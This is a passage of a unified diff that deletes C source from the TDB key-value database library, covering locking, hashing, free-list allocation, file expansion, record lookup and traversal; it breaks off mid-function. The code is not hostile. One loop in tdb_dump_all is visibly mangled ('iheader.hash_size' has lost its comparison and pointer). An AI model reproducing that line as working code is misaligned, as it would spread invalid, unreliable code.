tdb->locked[list+1].ltype = ltype; - } - tdb->locked[list+1].count++; - return 0; -} - -/* unlock the database: returns void because it's too late for errors. */ - /* changed to return int it may be interesting to know there - has been an error --simo */ -static int tdb_unlock(TDB_CONTEXT *tdb, int list, - int ltype __attribute__((unused))) -{ - int ret = -1; - - if (tdb->flags & TDB_NOLOCK) - return 0; - - /* Sanity checks */ - if (list < -1 || list >= (int)tdb->header.hash_size) { - TDB_LOG((tdb, 0, "tdb_unlock: list %d invalid (%d)\n", list, tdb->header.hash_size)); - return ret; - } - - if (tdb->locked[list+1].count==0) { - TDB_LOG((tdb, 0, "tdb_unlock: count is 0\n")); - return ret; - } - - if (tdb->locked[list+1].count == 1) { - /* Down to last nested lock: unlock underneath */ - ret = tdb_brlock(tdb, FREELIST_TOP+4*list, F_UNLCK, F_SETLKW, 0); - } else { - ret = 0; - } - tdb->locked[list+1].count--; - - if (ret) - TDB_LOG((tdb, 0,"tdb_unlock: An error occurred unlocking!\n")); - return ret; -} - -/* This is based on the hash algorithm from gdbm */ -static uint32_t default_tdb_hash(TDB_DATA *key) -{ - uint32_t value; /* Used to compute the hash value. */ - uint32_t i; /* Used to cycle through random values. */ - - /* Set the initial value from the key size. */ - for (value = 0x238F13AF * key->dsize, i=0; i < key->dsize; i++) - value = (value + (key->dptr[i] << (i*5 % 24))); - - return (1103515243 * value + 12345); -} - -/* check for an out of bounds access - if it is out of bounds then - see if the database has been expanded by someone else and expand - if necessary - note that "len" is the minimum length needed for the db -*/ -static int tdb_oob(TDB_CONTEXT *tdb, tdb_off len, int probe) -{ - struct stat st; - if (len <= tdb->map_size) - return 0; - if (tdb->flags & TDB_INTERNAL) { - if (!probe) { - /* Ensure ecode is set for log fn. */ - tdb->ecode = TDB_ERR_IO; - TDB_LOG((tdb, 0,"tdb_oob len %d beyond internal malloc size %d\n", - (int)len, (int)tdb->map_size)); - } - return TDB_ERRCODE(TDB_ERR_IO, -1); - } - - if (fstat(tdb->fd, &st) == -1) - return TDB_ERRCODE(TDB_ERR_IO, -1); - - if (st.st_size < (off_t)len) { - if (!probe) { - /* Ensure ecode is set for log fn. */ - tdb->ecode = TDB_ERR_IO; - TDB_LOG((tdb, 0,"tdb_oob len %d beyond eof at %d\n", - (int)len, (int)st.st_size)); - } - return TDB_ERRCODE(TDB_ERR_IO, -1); - } - - /* Unmap, update size, remap */ - if (tdb_munmap(tdb) == -1) - return TDB_ERRCODE(TDB_ERR_IO, -1); - tdb->map_size = st.st_size; - tdb_mmap(tdb); - return 0; -} - -/* write a lump of data at a specified offset */ -static int tdb_write(TDB_CONTEXT *tdb, tdb_off off, void *buf, tdb_len len) -{ - if (tdb_oob(tdb, off + len, 0) != 0) - return -1; - - if (tdb->map_ptr) - memcpy(off + (char *)tdb->map_ptr, buf, len); -#ifdef HAVE_PWRITE - else if (pwrite(tdb->fd, buf, len, off) != (ssize_t)len) { -#else - else if (lseek(tdb->fd, off, SEEK_SET) != (off_t)off - || write(tdb->fd, buf, len) != (off_t)len) { -#endif - /* Ensure ecode is set for log fn. */ - tdb->ecode = TDB_ERR_IO; - TDB_LOG((tdb, 0,"tdb_write failed at %d len=%d (%s)\n", - off, len, strerror(errno))); - return TDB_ERRCODE(TDB_ERR_IO, -1); - } - return 0; -} - -/* read a lump of data at a specified offset, maybe convert */ -static int tdb_read(TDB_CONTEXT *tdb,tdb_off off,void *buf,tdb_len len,int cv) -{ - if (tdb_oob(tdb, off + len, 0) != 0) - return -1; - - if (tdb->map_ptr) - memcpy(buf, off + (char *)tdb->map_ptr, len); -#ifdef HAVE_PREAD - else if (pread(tdb->fd, buf, len, off) != (off_t)len) { -#else - else if (lseek(tdb->fd, off, SEEK_SET) != (off_t)off - || read(tdb->fd, buf, len) != (off_t)len) { -#endif - /* Ensure ecode is set for log fn. */ - tdb->ecode = TDB_ERR_IO; - TDB_LOG((tdb, 0,"tdb_read failed at %d len=%d (%s)\n", - off, len, strerror(errno))); - return TDB_ERRCODE(TDB_ERR_IO, -1); - } - if (cv) - convert(buf, len); - return 0; -} - -/* don't allocate memory: used in tdb_delete path. */ -static int tdb_key_eq(TDB_CONTEXT *tdb, tdb_off off, TDB_DATA key) -{ - char buf[64]; - uint32_t len; - - if (tdb_oob(tdb, off + key.dsize, 0) != 0) - return -1; - - if (tdb->map_ptr) - return !memcmp(off + (char*)tdb->map_ptr, key.dptr, key.dsize); - - while (key.dsize) { - len = key.dsize; - if (len > sizeof(buf)) - len = sizeof(buf); - if (tdb_read(tdb, off, buf, len, 0) != 0) - return -1; - if (memcmp(buf, key.dptr, len) != 0) - return 0; - key.dptr += len; - key.dsize -= len; - off += len; - } - return 1; -} - -/* read a lump of data, allocating the space for it */ -static char *tdb_alloc_read(TDB_CONTEXT *tdb, tdb_off offset, tdb_len len) -{ - char *buf; - - if (!(buf = talloc_size(tdb, len))) { - /* Ensure ecode is set for log fn. */ - tdb->ecode = TDB_ERR_OOM; - TDB_LOG((tdb, 0,"tdb_alloc_read malloc failed len=%d (%s)\n", - len, strerror(errno))); - return TDB_ERRCODE(TDB_ERR_OOM, buf); - } - if (tdb_read(tdb, offset, buf, len, 0) == -1) { - SAFE_FREE(buf); - return NULL; - } - return buf; -} - -/* read/write a tdb_off */ -static int ofs_read(TDB_CONTEXT *tdb, tdb_off offset, tdb_off *d) -{ - return tdb_read(tdb, offset, (char*)d, sizeof(*d), DOCONV()); -} -static int ofs_write(TDB_CONTEXT *tdb, tdb_off offset, tdb_off *d) -{ - tdb_off off = *d; - return tdb_write(tdb, offset, CONVERT(off), sizeof(*d)); -} - -/* read/write a record */ -static int rec_read(TDB_CONTEXT *tdb, tdb_off offset, struct list_struct *rec) -{ - if (tdb_read(tdb, offset, rec, sizeof(*rec),DOCONV()) == -1) - return -1; - if (TDB_BAD_MAGIC(rec)) { - /* Ensure ecode is set for log fn. */ - tdb->ecode = TDB_ERR_CORRUPT; - TDB_LOG((tdb, 0,"rec_read bad magic 0x%x at offset=%d\n", rec->magic, offset)); - return TDB_ERRCODE(TDB_ERR_CORRUPT, -1); - } - return tdb_oob(tdb, rec->next+sizeof(*rec), 0); -} -static int rec_write(TDB_CONTEXT *tdb, tdb_off offset, struct list_struct *rec) -{ - struct list_struct r = *rec; - return tdb_write(tdb, offset, CONVERT(r), sizeof(r)); -} - -/* read a freelist record and check for simple errors */ -static int rec_free_read(TDB_CONTEXT *tdb, tdb_off off, struct list_struct *rec) -{ - if (tdb_read(tdb, off, rec, sizeof(*rec),DOCONV()) == -1) - return -1; - - if (rec->magic == TDB_MAGIC) { - /* this happens when a app is showdown while deleting a record - we should - not completely fail when this happens */ - TDB_LOG((tdb, 0,"rec_free_read non-free magic 0x%x at offset=%d - fixing\n", - rec->magic, off)); - rec->magic = TDB_FREE_MAGIC; - if (tdb_write(tdb, off, rec, sizeof(*rec)) == -1) - return -1; - } - - if (rec->magic != TDB_FREE_MAGIC) { - /* Ensure ecode is set for log fn. */ - tdb->ecode = TDB_ERR_CORRUPT; - TDB_LOG((tdb, 0,"rec_free_read bad magic 0x%x at offset=%d\n", - rec->magic, off)); - return TDB_ERRCODE(TDB_ERR_CORRUPT, -1); - } - if (tdb_oob(tdb, rec->next+sizeof(*rec), 0) != 0) - return -1; - return 0; -} - -/* update a record tailer (must hold allocation lock) */ -static int update_tailer(TDB_CONTEXT *tdb, tdb_off offset, - const struct list_struct *rec) -{ - tdb_off totalsize; - - /* Offset of tailer from record header */ - totalsize = sizeof(*rec) + rec->rec_len; - return ofs_write(tdb, offset + totalsize - sizeof(tdb_off), - &totalsize); -} - -static tdb_off tdb_dump_record(TDB_CONTEXT *tdb, tdb_off offset) -{ - struct list_struct rec; - tdb_off tailer_ofs, tailer; - - if (tdb_read(tdb, offset, (char *)&rec, sizeof(rec), DOCONV()) == -1) { - printf("ERROR: failed to read record at %u\n", offset); - return 0; - } - - printf(" rec: offset=0x%08x next=0x%08x rec_len=%d key_len=%d data_len=%d full_hash=0x%x magic=0x%x\n", - offset, rec.next, rec.rec_len, rec.key_len, rec.data_len, rec.full_hash, rec.magic); - - tailer_ofs = offset + sizeof(rec) + rec.rec_len - sizeof(tdb_off); - if (ofs_read(tdb, tailer_ofs, &tailer) == -1) { - printf("ERROR: failed to read tailer at %u\n", tailer_ofs); - return rec.next; - } - - if (tailer != rec.rec_len + sizeof(rec)) { - printf("ERROR: tailer does not match record! tailer=%u totalsize=%u\n", - (unsigned int)tailer, (unsigned int)(rec.rec_len + sizeof(rec))); - } - return rec.next; -} - -static int tdb_dump_chain(TDB_CONTEXT *tdb, int i) -{ - tdb_off rec_ptr, top; - - top = TDB_HASH_TOP(i); - - if (tdb_lock(tdb, i, F_WRLCK) != 0) - return -1; - - if (ofs_read(tdb, top, &rec_ptr) == -1) - return tdb_unlock(tdb, i, F_WRLCK); - - if (rec_ptr) - printf("hash=%d\n", i); - - while (rec_ptr) { - rec_ptr = tdb_dump_record(tdb, rec_ptr); - } - - return tdb_unlock(tdb, i, F_WRLCK); -} - -void tdb_dump_all(TDB_CONTEXT *tdb) -{ - unsigned int i; - for (i=0;iheader.hash_size;i++) { - tdb_dump_chain(tdb, i); - } - printf("freelist:\n"); - tdb_dump_chain(tdb, -1); -} - -int tdb_printfreelist(TDB_CONTEXT *tdb) -{ - int ret; - long total_free = 0; - tdb_off offset, rec_ptr; - struct list_struct rec; - - if ((ret = tdb_lock(tdb, -1, F_WRLCK)) != 0) - return ret; - - offset = FREELIST_TOP; - - /* read in the freelist top */ - if (ofs_read(tdb, offset, &rec_ptr) == -1) { - tdb_unlock(tdb, -1, F_WRLCK); - return 0; - } - - printf("freelist top=[0x%08x]\n", rec_ptr ); - while (rec_ptr) { - if (tdb_read(tdb, rec_ptr, (char *)&rec, sizeof(rec), DOCONV()) == -1) { - tdb_unlock(tdb, -1, F_WRLCK); - return -1; - } - - if (rec.magic != TDB_FREE_MAGIC) { - printf("bad magic 0x%08x in free list\n", rec.magic); - tdb_unlock(tdb, -1, F_WRLCK); - return -1; - } - - printf("entry offset=[0x%08x], rec.rec_len = [0x%08x (%d)] (end = 0x%08x)\n", - rec_ptr, rec.rec_len, rec.rec_len, rec_ptr + rec.rec_len); - total_free += rec.rec_len; - - /* move to the next record */ - rec_ptr = rec.next; - } - printf("total rec_len = [0x%08x (%d)]\n", (int)total_free, - (int)total_free); - - return tdb_unlock(tdb, -1, F_WRLCK); -} - -/* Remove an element from the freelist. Must have alloc lock. */ -static int remove_from_freelist(TDB_CONTEXT *tdb, tdb_off off, tdb_off next) -{ - tdb_off last_ptr, i; - - /* read in the freelist top */ - last_ptr = FREELIST_TOP; - while (ofs_read(tdb, last_ptr, &i) != -1 && i != 0) { - if (i == off) { - /* We've found it! */ - return ofs_write(tdb, last_ptr, &next); - } - /* Follow chain (next offset is at start of record) */ - last_ptr = i; - } - TDB_LOG((tdb, 0,"remove_from_freelist: not on list at off=%d\n", off)); - return TDB_ERRCODE(TDB_ERR_CORRUPT, -1); -} - -/* Add an element into the freelist. Merge adjacent records if - neccessary. */ -static int tdb_free(TDB_CONTEXT *tdb, tdb_off offset, struct list_struct *rec) -{ - tdb_off right, left; - - /* Allocation and tailer lock */ - if (tdb_lock(tdb, -1, F_WRLCK) != 0) - return -1; - - /* set an initial tailer, so if we fail we don't leave a bogus record */ - if (update_tailer(tdb, offset, rec) != 0) { - TDB_LOG((tdb, 0, "tdb_free: upfate_tailer failed!\n")); - goto fail; - } - - /* Look right first (I'm an Australian, dammit) */ - right = offset + sizeof(*rec) + rec->rec_len; - if (right + sizeof(*rec) <= tdb->map_size) { - struct list_struct r; - - if (tdb_read(tdb, right, &r, sizeof(r), DOCONV()) == -1) { - TDB_LOG((tdb, 0, "tdb_free: right read failed at %u\n", right)); - goto left; - } - - /* If it's free, expand to include it. */ - if (r.magic == TDB_FREE_MAGIC) { - if (remove_from_freelist(tdb, right, r.next) == -1) { - TDB_LOG((tdb, 0, "tdb_free: right free failed at %u\n", right)); - goto left; - } - rec->rec_len += sizeof(r) + r.rec_len; - } - } - -left: - /* Look left */ - left = offset - sizeof(tdb_off); - if (left > TDB_DATA_START(tdb->header.hash_size)) { - struct list_struct l; - tdb_off leftsize; - - /* Read in tailer and jump back to header */ - if (ofs_read(tdb, left, &leftsize) == -1) { - TDB_LOG((tdb, 0, "tdb_free: left offset read failed at %u\n", left)); - goto update; - } - left = offset - leftsize; - - /* Now read in record */ - if (tdb_read(tdb, left, &l, sizeof(l), DOCONV()) == -1) { - TDB_LOG((tdb, 0, "tdb_free: left read failed at %u (%u)\n", left, leftsize)); - goto update; - } - - /* If it's free, expand to include it. */ - if (l.magic == TDB_FREE_MAGIC) { - if (remove_from_freelist(tdb, left, l.next) == -1) { - TDB_LOG((tdb, 0, "tdb_free: left free failed at %u\n", left)); - goto update; - } else { - offset = left; - rec->rec_len += leftsize; - } - } - } - -update: - if (update_tailer(tdb, offset, rec) == -1) { - TDB_LOG((tdb, 0, "tdb_free: update_tailer failed at %u\n", offset)); - goto fail; - } - - /* Now, prepend to free list */ - rec->magic = TDB_FREE_MAGIC; - - if (ofs_read(tdb, FREELIST_TOP, &rec->next) == -1 || - rec_write(tdb, offset, rec) == -1 || - ofs_write(tdb, FREELIST_TOP, &offset) == -1) { - TDB_LOG((tdb, 0, "tdb_free record write failed at offset=%d\n", offset)); - goto fail; - } - - /* And we're done. */ - tdb_unlock(tdb, -1, F_WRLCK); - return 0; - - fail: - tdb_unlock(tdb, -1, F_WRLCK); - return -1; -} - - -/* expand a file. we prefer to use ftruncate, as that is what posix - says to use for mmap expansion */ -static int expand_file(TDB_CONTEXT *tdb, tdb_off size, tdb_off addition) -{ - char buf[1024]; -#ifdef HAVE_FTRUNCATE_EXTEND - if (ftruncate(tdb->fd, size+addition) != 0) { - TDB_LOG((tdb, 0, "expand_file ftruncate to %d failed (%s)\n", - size+addition, strerror(errno))); - return -1; - } -#else - char b = 0; - -#ifdef HAVE_PWRITE - if (pwrite(tdb->fd, &b, 1, (size+addition) - 1) != 1) { -#else - if (lseek(tdb->fd, (size+addition) - 1, SEEK_SET) != (off_t)(size+addition) - 1 || - write(tdb->fd, &b, 1) != 1) { -#endif - TDB_LOG((tdb, 0, "expand_file to %d failed (%s)\n", - size+addition, strerror(errno))); - return -1; - } -#endif - - /* now fill the file with something. This ensures that the file isn't sparse, which would be - very bad if we ran out of disk. This must be done with write, not via mmap */ - memset(buf, 0x42, sizeof(buf)); - while (addition) { - int n = addition>sizeof(buf)?sizeof(buf):addition; -#ifdef HAVE_PWRITE - int ret = pwrite(tdb->fd, buf, n, size); -#else - int ret; - if (lseek(tdb->fd, size, SEEK_SET) != (off_t)size) - return -1; - ret = write(tdb->fd, buf, n); -#endif - if (ret != n) { - TDB_LOG((tdb, 0, "expand_file write of %d failed (%s)\n", - n, strerror(errno))); - return -1; - } - addition -= n; - size += n; - } - return 0; -} - - -/* expand the database at least size bytes by expanding the underlying - file and doing the mmap again if necessary */ -static int tdb_expand(TDB_CONTEXT *tdb, tdb_off size) -{ - struct list_struct rec; - tdb_off offset; - - if (tdb_lock(tdb, -1, F_WRLCK) == -1) { - TDB_LOG((tdb, 0, "lock failed in tdb_expand\n")); - return -1; - } - - /* must know about any previous expansions by another process */ - tdb_oob(tdb, tdb->map_size + 1, 1); - - /* always make room for at least 10 more records, and round - the database up to a multiple of TDB_PAGE_SIZE */ - size = TDB_ALIGN(tdb->map_size + size*10, TDB_PAGE_SIZE) - tdb->map_size; - - if (!(tdb->flags & TDB_INTERNAL)) - tdb_munmap(tdb); - - /* - * We must ensure the file is unmapped before doing this - * to ensure consistency with systems like OpenBSD where - * writes and mmaps are not consistent. - */ - - /* expand the file itself */ - if (!(tdb->flags & TDB_INTERNAL)) { - if (expand_file(tdb, tdb->map_size, size) != 0) - goto fail; - } - - tdb->map_size += size; - - if (tdb->flags & TDB_INTERNAL) { - char *new_map_ptr = talloc_realloc_size(tdb, tdb->map_ptr, - tdb->map_size); - if (!new_map_ptr) { - tdb->map_size -= size; - goto fail; - } - tdb->map_ptr = new_map_ptr; - } else { - /* - * We must ensure the file is remapped before adding the space - * to ensure consistency with systems like OpenBSD where - * writes and mmaps are not consistent. - */ - - /* We're ok if the mmap fails as we'll fallback to read/write */ - tdb_mmap(tdb); - } - - /* form a new freelist record */ - memset(&rec,'\0',sizeof(rec)); - rec.rec_len = size - sizeof(rec); - - /* link it into the free list */ - offset = tdb->map_size - size; - if (tdb_free(tdb, offset, &rec) == -1) - goto fail; - - tdb_unlock(tdb, -1, F_WRLCK); - return 0; - fail: - tdb_unlock(tdb, -1, F_WRLCK); - return -1; -} - - -/* - the core of tdb_allocate - called when we have decided which - free list entry to use - */ -static tdb_off tdb_allocate_ofs(TDB_CONTEXT *tdb, tdb_len length, tdb_off rec_ptr, - struct list_struct *rec, tdb_off last_ptr) -{ - struct list_struct newrec; - tdb_off newrec_ptr; - - memset(&newrec, '\0', sizeof(newrec)); - - /* found it - now possibly split it up */ - if (rec->rec_len > length + MIN_REC_SIZE) { - /* Length of left piece */ - length = TDB_ALIGN(length, TDB_ALIGNMENT); - - /* Right piece to go on free list */ - newrec.rec_len = rec->rec_len - (sizeof(*rec) + length); - newrec_ptr = rec_ptr + sizeof(*rec) + length; - - /* And left record is shortened */ - rec->rec_len = length; - } else { - newrec_ptr = 0; - } - - /* Remove allocated record from the free list */ - if (ofs_write(tdb, last_ptr, &rec->next) == -1) { - return 0; - } - - /* Update header: do this before we drop alloc - lock, otherwise tdb_free() might try to - merge with us, thinking we're free. - (Thanks Jeremy Allison). */ - rec->magic = TDB_MAGIC; - if (rec_write(tdb, rec_ptr, rec) == -1) { - return 0; - } - - /* Did we create new block? */ - if (newrec_ptr) { - /* Update allocated record tailer (we - shortened it). */ - if (update_tailer(tdb, rec_ptr, rec) == -1) { - return 0; - } - - /* Free new record */ - if (tdb_free(tdb, newrec_ptr, &newrec) == -1) { - return 0; - } - } - - /* all done - return the new record offset */ - return rec_ptr; -} - -/* allocate some space from the free list. The offset returned points - to a unconnected list_struct within the database with room for at - least length bytes of total data - - 0 is returned if the space could not be allocated - */ -static tdb_off tdb_allocate(TDB_CONTEXT *tdb, tdb_len length, - struct list_struct *rec) -{ - tdb_off rec_ptr, last_ptr, newrec_ptr; - struct { - tdb_off rec_ptr, last_ptr; - tdb_len rec_len; - } bestfit = { 0, 0, 0 }; - - if (tdb_lock(tdb, -1, F_WRLCK) == -1) - return 0; - - /* Extra bytes required for tailer */ - length += sizeof(tdb_off); - - again: - last_ptr = FREELIST_TOP; - - /* read in the freelist top */ - if (ofs_read(tdb, FREELIST_TOP, &rec_ptr) == -1) - goto fail; - - bestfit.rec_ptr = 0; - - /* - this is a best fit allocation strategy. Originally we used - a first fit strategy, but it suffered from massive fragmentation - issues when faced with a slowly increasing record size. - */ - while (rec_ptr) { - if (rec_free_read(tdb, rec_ptr, rec) == -1) { - goto fail; - } - - if (rec->rec_len >= length) { - if (bestfit.rec_ptr == 0 || - rec->rec_len < bestfit.rec_len) { - bestfit.rec_len = rec->rec_len; - bestfit.rec_ptr = rec_ptr; - bestfit.last_ptr = last_ptr; - /* consider a fit to be good enough if we aren't wasting more than half the space */ - if (bestfit.rec_len < 2*length) { - break; - } - } - } - - /* move to the next record */ - last_ptr = rec_ptr; - rec_ptr = rec->next; - } - - if (bestfit.rec_ptr != 0) { - if (rec_free_read(tdb, bestfit.rec_ptr, rec) == -1) { - goto fail; - } - - newrec_ptr = tdb_allocate_ofs(tdb, length, bestfit.rec_ptr, rec, bestfit.last_ptr); - tdb_unlock(tdb, -1, F_WRLCK); - return newrec_ptr; - } - - /* we didn't find enough space. See if we can expand the - database and if we can then try again */ - if (tdb_expand(tdb, length + sizeof(*rec)) == 0) - goto again; - fail: - tdb_unlock(tdb, -1, F_WRLCK); - return 0; -} - -/* initialise a new database with a specified hash size */ -static int tdb_new_database(TDB_CONTEXT *tdb, int hash_size) -{ - struct tdb_header *newdb; - int size, ret = -1; - - /* We make it up in memory, then write it out if not internal */ - size = sizeof(struct tdb_header) + (hash_size+1)*sizeof(tdb_off); - if (!(newdb = talloc_zero_size(tdb, size))) - return TDB_ERRCODE(TDB_ERR_OOM, -1); - - /* Fill in the header */ - newdb->version = TDB_VERSION; - newdb->hash_size = hash_size; - if (tdb->flags & TDB_INTERNAL) { - tdb->map_size = size; - tdb->map_ptr = (char *)newdb; - memcpy(&tdb->header, newdb, sizeof(tdb->header)); - /* Convert the `ondisk' version if asked. */ - CONVERT(*newdb); - return 0; - } - if (lseek(tdb->fd, 0, SEEK_SET) == -1) - goto fail; - - if (ftruncate(tdb->fd, 0) == -1) - goto fail; - - /* This creates an endian-converted header, as if read from disk */ - CONVERT(*newdb); - memcpy(&tdb->header, newdb, sizeof(tdb->header)); - /* Don't endian-convert the magic food! */ - memcpy(newdb->magic_food, TDB_MAGIC_FOOD, strlen(TDB_MAGIC_FOOD)+1); - if (write(tdb->fd, newdb, size) != size) - ret = -1; - else - ret = 0; - - fail: - SAFE_FREE(newdb); - return ret; -} - -/* Returns 0 on fail. On success, return offset of record, and fills - in rec */ -static tdb_off tdb_find(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash, - struct list_struct *r) -{ - tdb_off rec_ptr; - - /* read in the hash top */ - if (ofs_read(tdb, TDB_HASH_TOP(hash), &rec_ptr) == -1) - return 0; - - /* keep looking until we find the right record */ - while (rec_ptr) { - if (rec_read(tdb, rec_ptr, r) == -1) - return 0; - - if (!TDB_DEAD(r) && hash==r->full_hash && key.dsize==r->key_len) { - /* a very likely hit - read the key */ - int cmp = tdb_key_eq(tdb, rec_ptr + sizeof(*r), key); - if (cmp < 0) - return 0; - else if (cmp > 0) - return rec_ptr; - } - rec_ptr = r->next; - } - return TDB_ERRCODE(TDB_ERR_NOEXIST, 0); -} - -/* As tdb_find, but if you succeed, keep the lock */ -static tdb_off tdb_find_lock_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash, int locktype, - struct list_struct *rec) -{ - uint32_t rec_ptr; - - if (tdb_lock(tdb, BUCKET(hash), locktype) == -1) - return 0; - if (!(rec_ptr = tdb_find(tdb, key, hash, rec))) - tdb_unlock(tdb, BUCKET(hash), locktype); - return rec_ptr; -} - -enum TDB_ERROR tdb_error(TDB_CONTEXT *tdb) -{ - return tdb->ecode; -} - -static struct tdb_errname { - enum TDB_ERROR ecode; const char *estring; -} emap[] = { {TDB_SUCCESS, "Success"}, - {TDB_ERR_CORRUPT, "Corrupt database"}, - {TDB_ERR_IO, "IO Error"}, - {TDB_ERR_LOCK, "Locking error"}, - {TDB_ERR_OOM, "Out of memory"}, - {TDB_ERR_EXISTS, "Record exists"}, - {TDB_ERR_NOLOCK, "Lock exists on other keys"}, - {TDB_ERR_NOEXIST, "Record does not exist"} }; - -/* Error string for the last tdb error */ -const char *tdb_errorstr(TDB_CONTEXT *tdb) -{ - uint32_t i; - for (i = 0; i < sizeof(emap) / sizeof(struct tdb_errname); i++) - if (tdb->ecode == emap[i].ecode) - return emap[i].estring; - return "Invalid error code"; -} - -/* update an entry in place - this only works if the new data size - is <= the old data size and the key exists. - on failure return -1. -*/ - -static int tdb_update_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash, TDB_DATA dbuf) -{ - struct list_struct rec; - tdb_off rec_ptr; - - /* find entry */ - if (!(rec_ptr = tdb_find(tdb, key, hash, &rec))) - return -1; - - /* must be long enough key, data and tailer */ - if (rec.rec_len < key.dsize + dbuf.dsize + sizeof(tdb_off)) { - tdb->ecode = TDB_SUCCESS; /* Not really an error */ - return -1; - } - - if (tdb_write(tdb, rec_ptr + sizeof(rec) + rec.key_len, - dbuf.dptr, dbuf.dsize) == -1) - return -1; - - if (dbuf.dsize != rec.data_len) { - /* update size */ - rec.data_len = dbuf.dsize; - return rec_write(tdb, rec_ptr, &rec); - } - - return 0; -} - -/* find an entry in the database given a key */ -/* If an entry doesn't exist tdb_err will be set to - * TDB_ERR_NOEXIST. If a key has no data attached - * then the TDB_DATA will have zero length but - * a non-zero pointer - */ - -TDB_DATA tdb_fetch(TDB_CONTEXT *tdb, TDB_DATA key) -{ - tdb_off rec_ptr; - struct list_struct rec; - TDB_DATA ret; - uint32_t hash; - - /* find which hash bucket it is in */ - hash = tdb->hash_fn(&key); - if (!(rec_ptr = tdb_find_lock_hash(tdb,key,hash,F_RDLCK,&rec))) - return tdb_null; - - ret.dptr = tdb_alloc_read(tdb, rec_ptr + sizeof(rec) + rec.key_len, - rec.data_len); - ret.dsize = rec.data_len; - tdb_unlock(tdb, BUCKET(rec.full_hash), F_RDLCK); - return ret; -} - -/* check if an entry in the database exists - - note that 1 is returned if the key is found and 0 is returned if not found - this doesn't match the conventions in the rest of this module, but is - compatible with gdbm -*/ -static int tdb_exists_hash(TDB_CONTEXT *tdb, TDB_DATA key, uint32_t hash) -{ - struct list_struct rec; - - if (tdb_find_lock_hash(tdb, key, hash, F_RDLCK, &rec) == 0) - return 0; - tdb_unlock(tdb, BUCKET(rec.full_hash), F_RDLCK); - return 1; -} - -int tdb_exists(TDB_CONTEXT *tdb, TDB_DATA key) -{ - uint32_t hash = tdb->hash_fn(&key); - return tdb_exists_hash(tdb, key, hash); -} - -/* record lock stops delete underneath */ -static int lock_record(TDB_CONTEXT *tdb, tdb_off off) -{ - return off ? tdb_brlock(tdb, off, F_RDLCK, F_SETLKW, 0) : 0; -} -/* - Write locks override our own fcntl readlocks, so check it here. - Note this is meant to be F_SETLK, *not* F_SETLKW, as it's not - an error to fail to get the lock here. -*/ - -static int write_lock_record(TDB_CONTEXT *tdb, tdb_off off) -{ - struct tdb_traverse_lock *i; - for (i = &tdb->travlocks; i; i = i->next) - if (i->off == off) - return -1; - return tdb_brlock(tdb, off, F_WRLCK, F_SETLK, 1); -} - -/* - Note this is meant to be F_SETLK, *not* F_SETLKW, as it's not - an error to fail to get the lock here. -*/ - -static int write_unlock_record(TDB_CONTEXT *tdb, tdb_off off) -{ - return tdb_brlock(tdb, off, F_UNLCK, F_SETLK, 0); -} -/* fcntl locks don't stack: avoid unlocking someone else's */ -static int unlock_record(TDB_CONTEXT *tdb, tdb_off off) -{ - struct tdb_traverse_lock *i; - uint32_t count = 0; - - if (off == 0) - return 0; - for (i = &tdb->travlocks; i; i = i->next) - if (i->off == off) - count++; - return (count == 1 ? tdb_brlock(tdb, off, F_UNLCK, F_SETLKW, 0) : 0); -} - -/* actually delete an entry in the database given the offset */ -static int do_delete(TDB_CONTEXT *tdb, tdb_off rec_ptr, struct list_struct*rec) -{ - tdb_off last_ptr, i; - struct list_struct lastrec; - - if (tdb->read_only) return -1; - - if (write_lock_record(tdb, rec_ptr) == -1) { - /* Someone traversing here: mark it as dead */ - rec->magic = TDB_DEAD_MAGIC; - return rec_write(tdb, rec_ptr, rec); - } - if (write_unlock_record(tdb, rec_ptr) != 0) - return -1; - - /* find previous record in hash chain */ - if (ofs_read(tdb, TDB_HASH_TOP(rec->full_hash), &i) == -1) - return -1; - for (last_ptr = 0; i != rec_ptr; last_ptr = i, i = lastrec.next) - if (rec_read(tdb, i, &lastrec) == -1) - return -1; - - /* unlink it: next ptr is at start of record. */ - if (last_ptr == 0) - last_ptr = TDB_HASH_TOP(rec->full_hash); - if (ofs_write(tdb, last_ptr, &rec->next) == -1) - return -1; - - /* recover the space */ - if (tdb_free(tdb, rec_ptr, rec) == -1) - return -1; - return 0; -} - -/* Uses traverse lock: 0 = finish, -1 = error, other = record offset */ -static int tdb_next_lock(TDB_CONTEXT *tdb, struct tdb_traverse_lock *tlock, - struct list_struct *rec) -{ - int want_next = (tlock->off != 0); - - /* Lock each chain from the start one. */ - for (; tlock->hash < tdb->header.hash_size; tlock->hash++) { - - /* this is an optimisation for the common case where - the hash chain is empty, which is particularly - common for the use of tdb with ldb, where large - hashes are used. In that case we spend most of our - time in tdb_brlock(), locking empty hash chains. - - To avoid this, we do an unlocked pre-check to see - if the hash chain is empty before starting to look - inside it. If it is empty then we can avoid that - hash chain. If it isn't empty then we can't believe - the value we get back, as we read it without a - lock, so instead we get the lock and re-fetch the - value below. - - Notice that not doing this optimisation on the - first hash chain is critical. We must guarantee - that we have done at least one fcntl lock at the - start of a search to guarantee that memory is - coherent on SMP systems. If records are added by - others during the search then thats OK, and we - could possibly miss those with this trick, but we - could miss them anyway without this trick, so the - semantics don't change. - - With a non-indexed ldb search this trick gains us a - factor of around 80 in speed on a linux 2.6.x - system (testing using ldbtest). - */ - if (!tlock->off && tlock->hash != 0) { - uint32_t off; - if (tdb->map_ptr) { - for (;tlock->hash < tdb->header.hash_size;tlock->hash++) { - if (0 != *(uint32_t *)(TDB_HASH_TOP(tlock->hash) + (unsigned char *)tdb->map_ptr)) { - break; - } - } - if (tlock->hash == tdb->header.hash_size) { - continue; - } - } else { - if (ofs_read(tdb, TDB_HASH_TOP(tlock->hash), &off) == 0 && - off == 0) { - continue; - } - } - } - - if (tdb_lock(tdb, tlock->hash, F_WRLCK) == -1) - return -1; - - /* No previous record? Start at top of chain. */ - if (!tlock->off) { - if (ofs_read(tdb, TDB_HASH_TOP(tlock->hash), - &tlock->off) == -1) - goto fail; - } else { - /* Otherwise unlock the previous record. */ - if (unlock_record(tdb, tlock->off) != 0) - goto fail; - } - - if (want_next) { - /* We have offset of old record: grab next */ - if (rec_read(tdb, tlock->off, rec) == -1) - goto fail; - tlock->off = rec->next; - } - - /* Iterate through chain */ - while( tlock->off) { - tdb_off current; - if (rec_read(tdb, tlock->off, rec) == -1) - goto fail; - - /* Detect infinite loops. From "Shlomi Yaakobovich" . */ - if (tlock->off == rec->next) { - TDB_LOG((tdb, 0, "tdb_next_lock: loop detected.\n")); - goto fail; - } - - if (!TDB_DEAD(rec)) { - 